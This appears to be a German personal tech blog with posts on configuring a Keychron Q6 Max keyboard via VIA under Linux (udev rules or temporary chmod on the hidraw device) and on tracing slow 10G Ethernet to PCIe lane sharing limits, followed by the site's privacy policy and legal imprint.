Mein Keychron Q6 Max-Keyboard lässt sich wie viele andere Keyboards dieses Herstellers (der damit nicht alleine dasteht) über das VIA-Protokoll komplett konfigurieren. Über eine plattformunabhängige Web-Oberfläche lassen sich nahezu alle Tasten komplett neu belegen und, sofern die Tastatur das unterstützt, die Beleuchtungseffekte steuern. Einmal eingerichtet speichert die Tastatur die Konfiguration intern, sie ist also nicht abhängig von irgendeiner Software, die auf dem Hostgerät installiert sein muss.

Keychron unterstützt offiziell die Konfiguration über VIA für Windows und MacOS. Doch auch unter Linux funktioniert das Ganze, Voraussetzung ist wie bei den anderen Betriebssystemen derzeit (Stand 06/2024) nur einen auf Chrome basierten Browser. Chrome, Brave, Edge, Chromium und so weiter funktionieren also, Firefox jedoch nicht. Sogar Opera funktioniert, doch den möchte ich noch weniger als den Edge empfehlen.

Geräteunabhängige Konfiguration über Chromium-basierte Browser

Um die Tastatur zu konfigurieren, muss sie über das USB-Kabel mit dem Hostgerät verbunden werden und die Einstellung mittels Schieberegler auf “Cable” geändert werden. Die Konfiguration über Funk-Dongle oder Bluetooth ist nicht möglich. Ruft man nun die VIA-Konfigurationsseite des Herstellers (oder alternativ die generische Seite) auf, beispielsweise mit Brave, erscheint ein Popup, das das Koppeln mit der Tastatur verlangt. Erscheint hier keine Tastatur, wurde entweder das Kabel nicht richtig gesteckt, der Modus nicht auf “Cable” gestellt oder die Tastatur ist nicht mit VIA kompatibel. Letzteres könnt ihr auf der Kompatibilitätsseite überprüfen.

Geklickt, gekoppelt - doch dann geschieht nichts. Die Seite zeigt keine Konfigurationsoptionen an, nicht einmal die Tastatur erscheint als Auswahl. Was ist da los? Ein Blick in die Geräte-Konsole von Chromium (der Link funktioniert nicht? Einfach chrome://device-log in die Adresszeile eingeben) zeigt den Übeltäter. Die folgenden HID-Fehlermeldungen tauchen zum Zeitpunkt des Verbindungsversuchs auf (der Gerätepfad kann sich am Ende unterscheiden):

Failed to open '/dev/hidraw9': FILE_ERROR_ACCESS_DENIED
HIDEvent[11:37:58] Access denied opening device read-write, trying read-only.

Der Browser (bzw. der User) hat keinen Schreibzugriff auf das Keyboard. Wir haben nun zwei Möglichkeiten, das Problem zu beheben: Wir setzen für die Zeit der Konfiguration entsprechende Nutzerrechte manuell und entziehen diese hinterher, oder wir definieren udev-Regeln, die Nutzern generell Schreibrechte für VIA-kompatible Geräte einräumen. Letzteres ist aus meiner Sicht die sinnvollere Lösung, ich zeige jedoch der Vollständigkeit halber beide auf.

Methode 1: udev-Regeln

Keychron verwendet die QMK-Firmware für ihre Keyboards. Das ist insofern schön, da es sich um eine OpenSource-Entwicklung handelt und damit eine breite und offene Unterstützung von Geräten gewährleistet wird. Im offiziellen Repository auf Github kann sich so jeder, der tiefer in die Materie eintauchen möchte, nach Belieben einarbeiten.

So tief brauchen wir uns aber gar nicht mit der Materie zu beschäftigen. Die udev-Regeln reichen uns vollkommen, diese finden wir hier. Wir speichern die Datei so wie sie ist ab und kopieren sie danach mittels sudo cp ~/Downloads/50-qmk.rules /etc/udev/rules.d an die richtige Stelle. Solltet ihr sie an einer anderen Stelle als ~/Downloads oder unter einem anderen Namen gespeichert haben, passt ihr natürlich die Kommandozeile entsprechend an.

Nach einem erneuten Einstecken der Tastatur via USB-Kabel sollte nun auch in der VIA-Oberfläche das Gerät auftauchen und ihr könnt loslegen.

Methode 2: Manuelles Setzen der Berechtigungen

Solltet ihr kein udev einsetzen (bei den meisten Linux-Distributionen ist es standardmäßig aktiv) oder Bedenken bzgl. der von Dritten bereitgestellten udev-Datei haben, könnt ihr das Problem auch per Hand temporär beheben.

Kopiert euch einfach den Gerätepfad aus der Chromium-Konsole (siehe oben) heraus und ersetzt den Beispiel-Gerätepfad aus der folgenden Kommandozeile damit:

sudo chmod a+rw /dev/hidraw9

Nun könnt ihr die Tastatur über die VIA-Oberfläche konfigurieren. Nach getaner Arbeit würde ich empfehlen, die Zugriffsrechte wieder auf ihren Standard zurückzusetzen, auch hier bitte daran denken, den Beispiel-Gerätepfad mit dem aus der Konsole zu ersetzen:

sudo chmod 600 /dev/hidraw9

Achtung! OS-Wahl und Layer

Ein Problem, über das viele Erstnutzer stolpern dürften, ist das Problem mit den vier angezeigten Layern. Layer sind verschiedene Tastaturebenen, die sich durch Tastenkombinationen ansteuern lassen. Ihr kennt das, FN+F4 schaltet die tastaturbeleuchtung an und aus, FN+F10 die Lautsprecher, und so weiter. Nun unterscheiden sich aber auch die betriebssystemspezifischen Tastenkombinationen voneinander: Windows hat zusätzlich zur Umschalt- und FN-Taste die Win- und Alt-Tasten, MacOS die Mac- und Options-Tasten. Diese sehen nicht nur unterschiedlich aus, sondern werden auch vom Betriebssystem unterschiedlich interpretiert. Ein einfaches Auswechseln der KeyCaps reicht also nicht, ein Mac würde trotzdem den falschen (Windows-) Keycode bekommen, wenn man die Mac-Taste drückt.

Keychron unterstützt zwei Modi bei seinen Tastaturen. Windows- und Mac-Modus. Über einen Wahlschalter wird so intern die Belegung der Tasten, bzw. der Keycode, den sie generieren, verändert. So reicht es, einen simplen Schalter umzulegen, um zwischen Windows- und Mac-Modus hin und her zu schalten, ohne dass das Betriebssystem dabei mitbekommt, dass ein zweiter Modus überhaupt existiert.

Durch die Art, wie dieses Umschalten softwareseitig mittels VIA abgebildet wird, ergibt sich ein Problem: VIA kennt zwei Layer, die sich konfigurieren lassen. Diese sind allerdings Modus-spezifisch. Damit man, egal in welchem Modus man sich gerade befindet, beide Modi konfigurieren kann, bildet VIA auf der Konfigurationsoberfläche einfach vier Modi ein: Zwei für die Mac-Belegung, zwei für Windows.

Standardmäßig ist auf der generischen VIA-Seite Layer 0 aktiviert (der Keychron-Wrapper erkennt den aktuellen Modus und aktiviert automatisch den richtigen Basis-Layer). Befindet man sich nun im Windows-Modus (den ich persönlich verwende, da er auch unter Linux am sinnvollsten erscheint) und ändert eine Tastenbelegung in Layer 0 oder 1, wird man schnell enttäuscht feststellen, dass die entsprechenden Änderungen nicht greifen. Layer 0 und 1 sind nämlich die Layer für den Mac-Modus. Ändert man hingegen die Tastenbelegung auf Layer 2 und 3, führt das zum Erfolg.

Keychron legt übrigens bei der Q6 Max KeyCaps sowohl für Mac- als auch für Windows-Belegungen bei, damit man seinen primären Modus direkt sichtbar belegen kann. Zusätzlich liegt ein “Lock”-KeyCap bei, den ich persönlich anstelle des “Mikrofon”-KeyCaps verwende, der über der “Home”-Taste ein Shortcut zu Siri bzw. Cortana ist. Da ich beides nicht nutze, habe ich diese Taste also mit “Win+L” belegt, also dem Shortcut, um den Bildschirm zu sperren. Der Makro-Editor der generischen VIA-Seite erfasst zumindest bei mir nicht alle Tastendrücke sauber im Aufzeichnungsmodus (die Keychron-Seite habe ich ehrlicherweise nicht vollständig getestet), aber das ist kein Problem, hier kann man sich mit dem manuellen Editor behelfen: {+KC_LGUI}{KC_L}{-KC_LGUI}

10G, 2.5G, 1G... ach, geh!

Da dachte ich, ich mache mal alles richtig: Mein neues NAS hat einen 10G-RJ45-Anschluss, also lag es nahe, die gesamte Infrastruktur wo es sinnvoll erschien auf 10G umzurüsten. Der Unifi Aggregation Switch für schnelle 10G-Anbindung, ein 1G-24-Port-Switch für alles andere, ein 8er 1G-PoE-Switch für alles ohne eigenes Netzteil und natürlich die gute alte UDM Pro für Verwaltung und alles drumherum. Für den PC gab’s eine 10G-Netzwerkkarte und dazwischen hängen eine Handvoll DAC-Kabel.

So weit, so gut. Alles verkabelt und eingerichtet, die ersten Pakete fließen - aber was ist das? Die Verbindung PC <-> Switch <-> NAS tröpfelt mit guten 2000 MBit/s herum. Da sollte mehr gehen. Also umstöpseln und testen. PC <-> NAS genau dasselbe bei direkter Verbindung, der Switch ist also nicht Schuld. Generell schließe ich Performance-Probleme der Datenträger aus, indem ich mittels iperf messe: iperf3 -c *Zielhost* -f m --parallel 16 -t 300 - dafür muss der iperf-Server auf dem Zielhost installiert sein, dafür werden Datenpakete dann aber direkt aus dem Arbeitsspeicher erzeugt udn kopiert. Der ist meist eher nicht das Bottleneck.

Verschiedene Konfigurationen des Netzwerkadapters, der MTU und anderen potenziellen Bottlenecks brachten keine Besserung. Mein auf dem Mainboard verbauter 2.5G-Anschluss lieferte etwa dieselben Werte, dafür ist das Ganze auch vollkommen valide. Schaltete mein 10G-Adapter etwa in den 2.5G-Modus?

Der Übeltäter: PCIe-Lanes!

Nach einigem Debuggen fiel mir auf, dass im Systemlog bei der Initialisierung der 10G-Karte eine Meldung auftauchte, dass sie im gedrosselten Modus (Gen2) laufe.

Zuerst einmal musste ich die Geräte-ID meiner Netzwerkkarte herausfinden. Am schnellsten geht das via lspci -nn | grep 10G, welches mir die Geräte-ID 0000:07:00.0 lieferte.

Nun ließ ich mir mittels cat /sys/bus/pci/devices/0000:07:00.0/current_link_width anzeigen, welche Bandbreite die Karte zugewiesen bekam. Das Ergebnis bestätigte meine Vermutung, die Ausgabe lieferte eine 2 statt der erwarteten 4.

Wie sich nach weiterer Recherche herausstellte, unterstützt mein Prozessor zwar das PCIe Lane Sharing-Konzept, mein Mainboard aber nicht. Gerade nicht benötigte PCIe-Lanes können darüber geteilt werden, sodass andere Geräte temporär mehr Lanes zur Verfügung gestellt bekommen können. Meine CPU bietet insgesamt 24 nutzbare PCIe-Lanes an. Da ich das System voll bestückt habe (große GPU: 8 Lanes, 3 NVMe SSDs: je 4 Lanes), sind nach Abzug der intern vom Mainboard belegten Lanes (ebenfalls 4 Lanes) einfach nicht genügend übrig, um auch noch die Netzwerkkarte voll zu versorgen. Stattdessen werden die Bandbreiten einiger PCIe-Geräte (in dem Fall primär die NVMes) gedrosselt, um die so frei werdenden Lanes umzuverteilen. Sprich: Mindestens eine meiner NVMes läuft ebenfalls im gedrosselten Modus, um der Netzwerkkarte überhaupt ihre Funktion zu ermöglichen.

Mein Mainboard hat den B650E-Chipsatz verbaut, ich würde den X670E-Chipsatz benötigen, um die entsprechende Funktionalität verwenden zu können. Damit bleibt mir aktuell entweder, die auf maximal 2.5G herabgestufte PCIe-Karte im Bonding mit der on-Board-2.5G-Karte zu betreiben und so wenigstens auf ca. 4000 MBit/s zu kommen, oder den WLAN- und LAN-Controller on-board zu deaktivieren und so die freigewordene Bandbreite besser unter den restlichen Geräten aufzuteilen. Die 10G-Karte kommt so derzeit auf ca. 3000 MBit/s. Vermutlich belasse ich es jetzt einfach so, bis ich in ein paar Jahren irgendwann einen neuen PC zusammenstelle. Bis dahin ist dann vermutlich auch PCIe 6.0 marktreif und das Mainboard kann mehr Bandbreite downstream verteilen.

Datenschutz (WIP)

Bei meinem Berufsbild ist es kein Wunder, dass mir Datenschutz und generell ein selbstbestimmter Umgang mit den eigenen Daten ein Anliegen sind. Doch auch schon vor meinem Einstieg in die IT-Security war es mir ein Anliegen, wenigstens einen Überblick darüber zu haben, wer welche Daten von mir erfasst - und was damit geschieht.

In dieser Rubrik möchte ich primär eine Übersicht von Informationsseiten zum Thema vorhalten. Links, Softwareempfehlungen, Überlegungen.

Impressum

imprint

für ichbinein.org und alle Subdomains

Angaben gemäß § 5 TMG

Folker Schmidt
Ahornstr. 19
12163 Berlin

Kontakt

Telefon: +49 (0) 1525 42 48 296
E-Mail: info@ichbinein.org
Threema: 3NPTTSMA

Datenschutz

Als Betreiber der Seite ichbinein.org und aller Subdomains liegt mir der Datenschutz sehr am Herzen. Meine Besucher sollen sich keine Sorgen machen müssen, was mit ihren Daten geschieht und an wen sie weitergegeben werden. Daher werden keine externen Ressourcen eingebunden, auch keine Tracker oder Statistik-Tools.
Die für den Betrieb der Dienste notwendigen Daten werden ausschließlich für den Betrieb und die Absicherung der verwendeten Server verwendet und keinen Dritten zugänglich gemacht. Eingesetzte Cookies dienen ausschließlich der Webseitenfunktion und werden nicht für Tracking-Zwecke verwendet.

ichbinein.org verwendet Cookies, um Benutzereinstellungen und Sessions zu speichern. Es werden keine Cookies Dritter eingesetzt. ichbinein.org bindet keine externen Ressourcen ein.
ichbinein.org verwendet lokales Javascript.

cloud.ichbinein.org verwendet Cookies, um Benutzereinstellungen und Sessions zu speichern. Es werden keine Cookies Dritter eingesetzt.
cloud.ichbinein.org bindet keine externen Ressourcen ein.
cloud.ichbinein.org verwendet lokales JavaScript.

Hyperlinks, die auf Seiten außerhalb dieses Servers verweisen, werden zum Zeitpunkt der Verlinkung nach bestem Wissen und Gewissen auf strafbare Inhalte und Gefährdungen geprüft. Eine regelmäßige nachgelagerte Überprüfung der Inhalte dieser verlinkten Seiten findet nicht statt. Sofern Kenntnis von entsprechenden besteht (entsprechende Hinweise können über die oben genannten Kontaktmöglichkeiten abgegeben werden), werden die entsprechenden Verlinkungen zeitnah entfernt. Für die Inhalte externer Webseiten ist alleine der jeweilige Betreiber zuständig.

Aufgrund technischer Notwendigkeiten der Sicherheitsmechanismen des Servers werden Zugriffe auf die Webseiten in Log-Dateien festgehalten. Es werden die IP-Adresse des zugreifenden Geräts, die aufgerufene Ressource (URL), der User Agent des Browsers sowie Meta-Informationen zum ausgelieferten Content (Statuscode, Anzahl übertragener Bytes) erfasst. Die Logdateien werden ausschließlich von den Sicherheitsmechanismen ausgewertet, die lokal betrieben werden. Eine Einbindung Dritter oder Analysen darüber hinaus finden nicht statt. Die Logdateien werden darüber hinaus automatisch gelöscht, sobald sie nicht mehr für die genannten Zwecke benötigt werden.